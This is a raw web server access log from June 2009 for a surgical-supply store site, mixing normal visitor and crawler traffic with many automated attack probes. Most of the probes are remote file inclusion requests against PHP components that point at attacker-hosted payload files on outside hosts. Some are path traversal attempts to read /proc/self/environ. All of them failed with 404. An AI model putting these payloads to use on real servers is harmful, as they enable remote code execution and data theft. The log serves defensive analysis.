68.4.163.27 - - [08/Jun/2009:02:15:23 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L102CB94E2ED28600346E05I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
68.4.163.27 - - [08/Jun/2009:02:15:23 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L102CB94E2ED28600346E05I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
68.4.163.27 - - [08/Jun/2009:02:15:24 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L102CB94E2ED28600346E05I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
68.4.163.27 - - [08/Jun/2009:02:15:24 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L102CB94E2ED28600346E05I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
87.106.67.146 - - [08/Jun/2009:02:15:43 -0400] "GET /logs/access_log.Q109052600//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:02:15:59 -0400] "GET /logs/access_log.Q109050700 HTTP/1.0" 200 301885 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.170 - - [08/Jun/2009:02:16:04 -0400] "GET /logs/access_log.Q109050700 HTTP/1.0" 200 301885 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.229.183.77 - - [08/Jun/2009:02:16:11 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.nardonefuneral.com/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.229.183.77 - - [08/Jun/2009:02:16:11 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.nardonefuneral.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:02:15:53 -0400] "GET /logs/access_log.Q109051600 HTTP/1.0" 200 2853952 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.109.250.45 - - [08/Jun/2009:02:16:16 -0400] "GET /logs/access_log.Q109052900%20%20//skin/zero_vote/setup.php?dir=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.109.250.45 - - [08/Jun/2009:02:16:16 -0400] "GET /logs/error_log.Q109052900%20%20//skin/zero_vote/setup.php?dir=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:02:16:45 -0400] "GET /scripts/ HTTP/1.0" 200 802 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.127.77.56 - - [08/Jun/2009:02:17:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
77.127.77.56 - - [08/Jun/2009:02:17:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
77.127.77.56 - - [08/Jun/2009:02:17:15 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
209.59.12.99 - - [08/Jun/2009:02:17:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.127.77.56 - - [08/Jun/2009:02:17:15 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
87.106.67.146 - - [08/Jun/2009:02:17:28 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:17:30 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:17:32 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.152.82 - - [08/Jun/2009:02:17:58 -0400] "GET /logs/access_log.Q109052800%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:02:17:58 -0400] "GET /logs/access_log.Q109052600%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:02:17:58 -0400] "GET /logs/access_log.Q109052100%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:18:05 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:18:10 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:18:10 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:18:30 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:18:30 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:18:30 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:02:18:36 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:02:18:37 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:20:49 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:20:49 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:20:49 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:21:51 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:02:21:59 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:02:21:59 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:02:21:59 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:22:10 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:22:10 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:22:10 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:02:22:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [08/Jun/2009:02:22:26 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
222.239.76.25 - - [08/Jun/2009:02:22:26 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
222.239.76.25 - - [08/Jun/2009:02:22:26 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
77.221.152.82 - - [08/Jun/2009:02:23:30 -0400] "GET /logs/access_log.Q109051100//My_eGallery/public/displayCategory.php?basepath=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:02:23:30 -0400] "GET //My_eGallery/public/displayCategory.php?basepath=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:02:23:30 -0400] "GET /logs//My_eGallery/public/displayCategory.php?basepath=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
77.221.152.82 - - [08/Jun/2009:02:23:31 -0400] "GET /logs/access_log.Q109052100//My_eGallery/public/displayCategory.php?basepath=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
74.6.22.170 - - [08/Jun/2009:02:23:38 -0400] "GET /images/items/Thumbs.db HTTP/1.0" 200 1317376 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.250.85.200 - - [08/Jun/2009:02:24:36 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:24:36 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:02:24:59 -0400] "GET /logs/%20/kiklop////errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 225 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [08/Jun/2009:02:24:59 -0400] "GET /%20/kiklop////errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 220 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [08/Jun/2009:02:24:59 -0400] "GET /logs/access_log.Q109052400/%20/kiklop////errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 247 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [08/Jun/2009:02:25:00 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [08/Jun/2009:02:25:00 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [08/Jun/2009:02:25:00 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [08/Jun/2009:02:25:00 -0400] "GET /logs/access_log.Q109052400/%20/kiklop////errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 247 "-" "XXXXXX"
77.221.130.2 - - [08/Jun/2009:02:25:00 -0400] "GET /logs/%20/kiklop////errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 225 "-" "XXXXXX"
77.221.130.2 - - [08/Jun/2009:02:25:00 -0400] "GET /%20/kiklop////errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 220 "-" "XXXXXX"
77.221.130.2 - - [08/Jun/2009:02:25:00 -0400] "GET /logs/%20/kiklop////errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "XXXXXX"
77.221.130.2 - - [08/Jun/2009:02:25:00 -0400] "GET /logs/access_log.Q109052400/%20/kiklop////errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "XXXXXX"
77.221.130.2 - - [08/Jun/2009:02:25:00 -0400] "GET /%20/kiklop////errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 220 "-" "XXXXXX"
61.109.250.45 - - [08/Jun/2009:02:25:33 -0400] "GET /logs/error_log.Q109052900//skin/zero_vote/setup.php?dir=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.239.76.25 - - [08/Jun/2009:02:25:42 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
77.221.152.82 - - [08/Jun/2009:02:26:09 -0400] "GET /logs/access_log.Q109052200%20//My_eGallery/public/displayCategory.php?basepath=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:02:26:26 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:02:26:27 -0400] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:02:26:27 -0400] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
203.185.28.194 - - [08/Jun/2009:02:26:43 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:27:15 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:27:15 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:27:15 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:27:25 -0400] "GET /logs/access_log.Q109053100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:27:27 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:27:27 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:27:27 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:27:39 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:27:39 -0400] "GET /e404.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:02:27:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [08/Jun/2009:02:27:41 -0400] "GET /logs/access_log.Q109053100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:02:27:57 -0400] "GET //admin.php?submit=submit&form_include_template=http://www.isolationtoulouse.com/administrator/components/com_joomla-visites/core/include/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:02:27:58 -0400] "GET /logs/access_log.Q109053100//admin.php?submit=submit&form_include_template=http://www.isolationtoulouse.com/administrator/components/com_joomla-visites/core/include/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:02:27:58 -0400] "GET /logs//admin.php?submit=submit&form_include_template=http://www.isolationtoulouse.com/administrator/components/com_joomla-visites/core/include/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:02:28:32 -0400] "GET /logs/error_log.Q109051900%20%20//admin.php?submit=submit&form_include_template=http://www.isolationtoulouse.com/administrator/components/com_joomla-visites/core/include/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:02:28:32 -0400] "GET /logs/access_log.Q109053100%20%20//admin.php?submit=submit&form_include_template=http://www.isolationtoulouse.com/administrator/components/com_joomla-visites/core/include/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.15.14.89 - - [08/Jun/2009:02:28:38 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kamtiez.comind.it/bajoid.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
67.15.14.89 - - [08/Jun/2009:02:28:39 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kamtiez.comind.it/bajoid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
67.15.14.89 - - [08/Jun/2009:02:28:39 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kamtiez.comind.it/bajoid.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
77.221.130.2 - - [08/Jun/2009:02:31:12 -0400] "GET /logs/access_log.Q109052500/%20/kiklop////errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 247 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.221.130.2 - - [08/Jun/2009:02:31:13 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
77.221.130.2 - - [08/Jun/2009:02:31:13 -0400] "GET /logs/access_log.Q109052500/%20/kiklop////errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 247 "-" "XXXXXX"
77.221.130.2 - - [08/Jun/2009:02:31:14 -0400] "GET /logs/access_log.Q109052500/%20/kiklop////errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "XXXXXX"
70.85.165.10 - - [08/Jun/2009:02:31:16 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
92.53.104.33 - - [08/Jun/2009:02:31:17 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.d1011163-2.cp.blacknight.com/components/com_agora/omilaid.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
92.53.104.33 - - [08/Jun/2009:02:31:17 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.d1011163-2.cp.blacknight.com/components/com_agora/omilaid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
92.53.104.33 - - [08/Jun/2009:02:31:18 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.d1011163-2.cp.blacknight.com/components/com_agora/omilaid.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
70.85.165.10 - - [08/Jun/2009:02:31:24 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:31:28 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:02:31:41 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:31:41 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
212.150.52.114 - - [08/Jun/2009:02:31:48 -0400] "GET /logs/error_log.Q109042900//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
76.214.13.13 - - [08/Jun/2009:02:32:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
76.214.13.13 - - [08/Jun/2009:02:32:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
76.214.13.13 - - [08/Jun/2009:02:32:10 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
76.214.13.13 - - [08/Jun/2009:02:32:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
76.214.13.13 - - [08/Jun/2009:02:32:29 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Alloss HTTP/1.1" 200 38015 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
76.214.13.13 - - [08/Jun/2009:02:32:30 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Alloss" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
76.214.13.13 - - [08/Jun/2009:02:32:30 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Alloss" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
